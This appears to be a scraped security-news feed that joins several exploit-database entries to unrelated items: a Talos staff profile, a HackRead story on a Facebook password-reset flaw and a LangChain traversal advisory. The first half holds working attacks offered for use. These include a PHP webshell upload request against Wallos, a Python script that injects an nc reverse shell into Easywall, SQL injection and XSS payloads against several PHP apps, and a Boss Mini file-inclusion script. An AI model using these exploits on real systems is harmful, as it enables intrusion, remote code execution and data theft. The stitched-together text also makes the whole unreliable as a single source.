Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

Petrol Pump Management System version 1.0 suffers from a remote shell upload vulnerability. This is a variant vector of attack in comparison to the original discovery attributed to SoSPiro in February of 2024.

    # Exploit Title: File Upload Remote Code Execution (RCE) in Petrol PumpManagement Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27747# Description: File Upload vulnerability in Petrol Pump Management Softwarev.1.0 allows an attacker to execute arbitrary code via a crafted payload tothe email Image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the phpinfo.php file in "Image" field5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page6. The content of phpinfo.php file is given below:<?php phpinfo();?># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747

Petrol Pump Management System 1.0 Shell Upload

Petrol Pump Management Software version 1.0 suffers from a remote SQL injectionvulnerability.

    # Exploit Title: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0.# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27746# Description: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the email address parameter in the index.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with username: test@test.com';SELECT SLEEP(10)# andPassword=test3. Page will load for 10 seconds because of time-based sql injection# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

Petrol Pump Management Software 1.0 SQL Injection

Petrol Pump Management Software version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27743# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the Address parameter in the add_invoices.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"4. Fill the payload "<script>alert(0)</script>" in "Address" field5. Stored XSS will be present in "http://localhost/fuelflow/admin/manage_invoices.php" page# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743-----# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27744# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the xss.svg file in "Image" field5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page6. The content of the xss.svg file is given below:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>  <script type="text/javascript">    alert("XSS by Shubham Pandey");  </script></svg># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744

Petrol Pump Management Software 1.0 Cross Site Scripting

Easywall version 0.3.1 suffers from an authenticated remote command execution vulnerability.

    # Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution# Date: 30-11-2023# Exploit Author: Melvin Mejia# Vendor Homepage: https://jpylypiw.github.io/easywall/# Software Link: https://github.com/jpylypiw/easywall# Version: 0.3.1# Tested on: Ubuntu 22.04import requests, json, urllib3urllib3.disable_warnings()def exploit():        # Replace values needed here    target_host = "192.168.1.25"    target_port= "12227"    lhost = "192.168.1.10"    lport = "9001"    user = "admin"    password = "admin"        target = f"https://{target_host}:{target_port}"    # Authenticate to the app    print("[+] Attempting login with the provided credentials...")    login_data = {"username":user, "password":password}    session = requests.session()    try:        login = session.post(f'{target}/login',data=login_data,verify=False)    except Exception as ex:        print("[!] There was a problem connecting to the app, error:", ex)        exit(1)    if login.status_code != 200:        print("[!] Login failed.")        exit(1)    else:        print("[+] Login successfull.")            # Send the payload, the port parameter suffers from a command injection vulnerability    print("[+] Attempting to send payload.")    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)    if send_payload.status_code != 200:        print("[!] Failed to send payload.")        exit(1)    else:        print("[+] Payload sent.")    # Trigger the execution of the payload    print("[+] Attempting execution.")    data = {"step_1":"", "step_2":""}    execute = session.post(f"{target}/apply-save",data=data, verify=False)    if execute.status_code != 200:        print("[!] Attempt to execute failed.")        exit(1)    else:        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")exploit()

Easywall 0.3.1 Remote Command Execution

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

. The bulk of her career was with a manufacturing company working as a security and email administrator, but she uses her criminal justice degree daily now with Talos IR helping to track down bad actors or helping customers understand adversaries’ motivation and tactics.

Monday, March 4, 2024 08:00

“Gotta Fly Now” is more closely associated with corporate hype videos or conferences with thousands of attendees in a mid-market city’s convention center than it is from its origins in the “Rocky” movies. 

But Heather Couk thinks it’s useful in incident response calls, too. 

Couk, an incident response commander with Cisco Talos Incident Response, says she jokingly threatens to play it in team meetings or on calls with clients to bring the energy up in the room (whether it be a virtual one or otherwise). The song inspires everyone to rally together in an environment that’s usually very stressful or coming on someone’s worst day of their professional career.  

Her calm demeanor, optimism and love of the “Rocky” soundtrack are all things that Couk brings into each engagement with a Talos IR customer, whether they’re tackling an active ransomware engagement or just ready to sit down for a tabletop exercise to hone their emergency response plan.  

 “When you have someone on the other end of the phone, you don’t know the panic or the circumstances that they are working with. Everyone deals with stress and crisis in different ways,” she said. “The main thing to do is listen and make them feel comfortable. Once someone can convey all their emotions and thoughts, that can give you some sense of comfort.” 

The personal side of Couk’s job in incident response mainly came with practice and repetition, but her interest in incident response and cybersecurity was initially fueled in the classroom.  

Initially in high school, Couk said she was planning on graduating and majoring in psychology in college. But as she was working on a project for which she needed to design and print some pamphlets for another class, she connected with an IT teacher at her school who helped her over winter break. 

After the project was over, Couk wrote a note to the teacher, thanking him for his assistance — something the teacher said he had never seen before. So, Couk ended up getting a small job with the teacher working on networking all the computers in her school’s district together, doing basic troubleshooting and working on the help desk for the project.  

“That fueled my passion for computers,” Couk recalled. 

She wound up double majoring in criminal justice and computer science at Missouri Southern State University. The bulk of her career was with a manufacturing company working as a security and email administrator, but she uses her criminal justice degree daily now with Talos IR helping to track down bad actors or helping customers understand adversaries’ motivation and tactics.  

“I’m routinely on call, and when I’m on call, you have to be willing to change direction,” she said. “Sometimes you’ll get unique requests where you have to be creative in your approach.” 

__Heather likes to take a break from the grind of incident response by taking her two dogs and cat out of what she calls "recess" time outside — her husband especially enjoys watching them play remotely through the home's video doorbell.__ 

During her on-call time, Couk is addressing customer concerns as they come in, often helping in emergency response engagements and addressing a data breach or cyber attack in real-time. Other days, she’s conducting proactive services with customers, including testing their incident response plans in exercises, creating new plans from the ground up, and conducting other types of training for their IT teams.  

While these can be very stressful environments, Couk says her team — and some inspirational music — help her stay on-task and focused.  

“My team is always there to pick up for me if I miss something,” she said. “Everybody has each other’s backs. It’s just very refreshing, there’s not a lot of focus on ‘Let’s look at what you did wrong and try to fix that.’ Everybody tries to stay positive, and that goes a long way when you’re trying to keep your temperament cool, calm and collected.” 

Also keeping her calm at home are her two dogs and a cat who she regularly enjoys taking outside for breaks throughout the day. Even just a five-minute walk around the block is enough for her to reset, Couk says, but for longer breaks, everyone goes out in the front yard for what her family jokingly calls “recess” with all the pets.  

Couk also enjoys stepping back from the day-to-day emergency response of IR to look at broader attacker trends. She frequently participates in the Talos IR On Air streams recapping the past quarter’s data in Talos IR engagements and collecting the data for Talos’ accompanying reports.  

In the coming year, she said she expects remote software to be a major focus for attackers, and a place that defenders need to be paying more attention to. Remote access software has become more popular since more workers went remote after the COVID-19 pandemic, but it also opens the door to adversaries to silently infiltrate targeted networks by just stealing one set of legitimate login credentials. 

“Companies need to get a better handle on how those are used and deployed in the environment,” Couk said. “I’m always trying to stay abreast to all the latest threats, that way I’m aware of the opportunities to strengthen and harden customers’ environments.” 

While it can be satisfying for Couk to stop an attacker in their tracks or lead a customer through an active event, she said it’s the ongoing relationships that make her feel most fulfilled in incident response. Repeated conversations and meetings with customers (and successfully helping them in any situation) builds trust over time, Couk says, and she can then benefit from that trust to help them act even faster the next time. 

“I love it when we can predict what the adversary’s next action is going to be,” she said. “Then the customer trusts us, knows we’ve seen this before and been around, and it feels good to aid others and tell them what we’ve seen, so we can get it stopped faster the next time. It’s the classic ‘good vs. evil' battle.”

Heather Couk is here to keep your spirits up during a cyber emergency, even if it takes the “Rocky” music

By Deeba Ahmed
It is unclear how much the hacker received as part of the Facebook bug bounty program.
This is a post from HackRead.com Read the original post: Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw

Samip Aryal, a cybersecurity researcher and an ethical hacker from Nepal, bypassed the system’s rate-limiting feature and subsequently checked possible combinations of 6-digit numbers (from 000000 to 999999) for two hours.

Samip Aryal, a Nepali bug bounty hunter, discovered a zero-click flaw in Facebook’s password reset system, potentially allowing hackers to compromise any targeted account. This exploit earned Aryal his highest bug bounty, making him top the Facebook Hall of Fame for White-Hat Hackers 2024 ranking, though the exact bounty amount remains unknown.\]

Samip Aryal tops Facebook Hall of Fame list

Aryal discovered a way to abuse Facebook’s password reset functionality without rate-limiting. The bug allowed attackers to hijack user accounts through “zero-click” attacks (without user interaction) by requesting a password reset and brute force the 6-digit security codes. 

The vulnerability was discovered in Facebook’s password reset functionality. It allowed hackers to bypass the system’s rate-limiting feature and subsequently check possible combinations of 6-digit numbers (from 000000 to 999999) for two hours.

In his blog, Aryal revealed finding a vulnerable endpoint on Android Studio while testing Facebook versions. He received a pop-up in the password reset flow offering users to send a security code through Facebook notification. The code remained active for two hours despite incorrect inputs.

“I didn’t see any sort of code invalidation after entering the correct code but with multiple previous invalid tries (unlike in the SMS reset functionality),” Aryal explained.

He used a brute-force attack methodology to cover the entire search space in an hour, revealing that some users had the nonce code displayed on the notification, a zero-click exploit. The code was displayed on another screen with a single click.

For your information, a cryptographic nonce is an arbitrary number that can only be used once in a cryptographic communication. He further noted that hackers could hijack Facebook user accounts by choosing any account, going to its password reset flow, selecting “Send code via Facebook notification,” trying any code to receive a server response, and brute forcing it in two hours. Facebook application users would receive notifications with a six-digit code or prompting them to tap to see the login code.

PoC GIF

Aryal responsibly disclosed the flaw to Facebook on January 30, 2024, and the issue was fixed on February 2. 

The vulnerability could lead to personal information theft, disinformation spread, and network attacks. Being aware of emerging security threats on Meta and other social networking platforms is also crucial to keep your accounts protected.

It is worth mentioning that Meta accounts have particularly been the target of scams lately. In March 2023, researchers at Guardio discovered an info-stealing campaign involving fake ChatGPT extensions claiming to integrate with Google search results but in reality attempting to steal Facebook accounts. 

WithSecure cybersecurity firm identified a connection between recent DarkGate malware attacks and Vietnam-based threat actors attempting to hijack Meta business accounts and steal sensitive data in October 2023.

To stay safe, users should enable two-factor authentication, use strong, unique passwords, be cautious with password reset requests, and stay updated on security threats. 

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **10 Famous Bug Bounty Hunters of All Time**
3.  **Bug bounty: Hack Tesla Model 3 to win your own Model 3**
4.  **OpenAI’s ChatGPT Bug Bounty Program – Earn $200 to $20k**
5.  **Bug Bounty: Earn $40K for hacking Facebook, Instagram, WhatsApp**

Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw

LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.

**LangChain directory traversal vulnerability**

Low severity GitHub Reviewed Published Mar 4, 2024 to the GitHub Advisory Database • Updated Mar 6, 2024

Tag

#git